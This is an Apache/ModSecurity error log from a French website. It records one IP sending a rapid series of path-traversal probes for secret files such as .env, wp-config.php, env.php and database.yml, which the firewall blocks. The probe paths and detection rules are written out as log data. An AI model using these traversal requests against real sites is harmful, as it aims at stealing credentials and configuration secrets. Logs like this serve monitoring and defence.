[Tue May 12 05:10:36.872156 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaLM1tk6y7yBJLpJozRgAAAIk"]
[Tue May 12 05:10:36.872214 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaLM1tk6y7yBJLpJozRgAAAIk"]
[Tue May 12 05:10:36.872327 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaLM1tk6y7yBJLpJozRgAAAIk"]
[Tue May 12 05:10:36.872517 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaLM1tk6y7yBJLpJozRgAAAIk"]
[Tue May 12 05:10:36.890398 2026] [core:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] AH10244: invalid URI path (/files../../../.env)
[Tue May 12 05:10:37.098816 2026] [core:error] [pid 1825179:tid 1825207] [client 45.148.10.246:3362] AH10244: invalid URI path (/files../../../../.env)
[Tue May 12 05:10:37.246169 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLXo6NvB9WXx5V-6nVAAAAQg"]
[Tue May 12 05:10:37.246248 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLXo6NvB9WXx5V-6nVAAAAQg"]
[Tue May 12 05:10:37.246380 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLXo6NvB9WXx5V-6nVAAAAQg"]
[Tue May 12 05:10:37.246599 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLXo6NvB9WXx5V-6nVAAAAQg"]
[Tue May 12 05:10:37.264219 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLXo6NvB9WXx5V-6nVQAAAQg"]
[Tue May 12 05:10:37.264290 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLXo6NvB9WXx5V-6nVQAAAQg"]
[Tue May 12 05:10:37.264396 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLXo6NvB9WXx5V-6nVQAAAQg"]
[Tue May 12 05:10:37.264579 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLXo6NvB9WXx5V-6nVQAAAQg"]
[Tue May 12 05:10:37.283385 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLXo6NvB9WXx5V-6nVgAAAQg"]
[Tue May 12 05:10:37.283445 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLXo6NvB9WXx5V-6nVgAAAQg"]
[Tue May 12 05:10:37.283554 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLXo6NvB9WXx5V-6nVgAAAQg"]
[Tue May 12 05:10:37.283738 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLXo6NvB9WXx5V-6nVgAAAQg"]
[Tue May 12 05:10:37.300724 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaLXo6NvB9WXx5V-6nVwAAAQg"]
[Tue May 12 05:10:37.300851 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaLXo6NvB9WXx5V-6nVwAAAQg"]
[Tue May 12 05:10:37.301058 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaLXo6NvB9WXx5V-6nVwAAAQg"]
[Tue May 12 05:10:37.318080 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaLXo6NvB9WXx5V-6nWAAAAQg"]
[Tue May 12 05:10:37.318220 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaLXo6NvB9WXx5V-6nWAAAAQg"]
[Tue May 12 05:10:37.318398 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaLXo6NvB9WXx5V-6nWAAAAQg"]
[Tue May 12 05:10:37.335846 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaLXo6NvB9WXx5V-6nWQAAAQg"]
[Tue May 12 05:10:37.336001 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaLXo6NvB9WXx5V-6nWQAAAQg"]
[Tue May 12 05:10:37.336192 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaLXo6NvB9WXx5V-6nWQAAAQg"]
[Tue May 12 05:10:37.355187 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaLXo6NvB9WXx5V-6nWgAAAQg"]
[Tue May 12 05:10:37.355244 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaLXo6NvB9WXx5V-6nWgAAAQg"]
[Tue May 12 05:10:37.355341 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaLXo6NvB9WXx5V-6nWgAAAQg"]
[Tue May 12 05:10:37.355517 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaLXo6NvB9WXx5V-6nWgAAAQg"]
[Tue May 12 05:10:37.372385 2026] [core:error] [pid 1730175:tid 1730185] [client 45.148.10.246:3376] AH10244: invalid URI path (/public../../../.env)
[Tue May 12 05:10:37.447323 2026] [core:error] [pid 1825287:tid 1825315] [client 45.148.10.246:3390] AH10244: invalid URI path (/public../../../../.env)
[Tue May 12 05:10:37.547783 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLTue9Sp-pIv_Bb69NQAAAU0"]
[Tue May 12 05:10:37.547875 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLTue9Sp-pIv_Bb69NQAAAU0"]
[Tue May 12 05:10:37.548055 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLTue9Sp-pIv_Bb69NQAAAU0"]
[Tue May 12 05:10:37.548295 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLTue9Sp-pIv_Bb69NQAAAU0"]
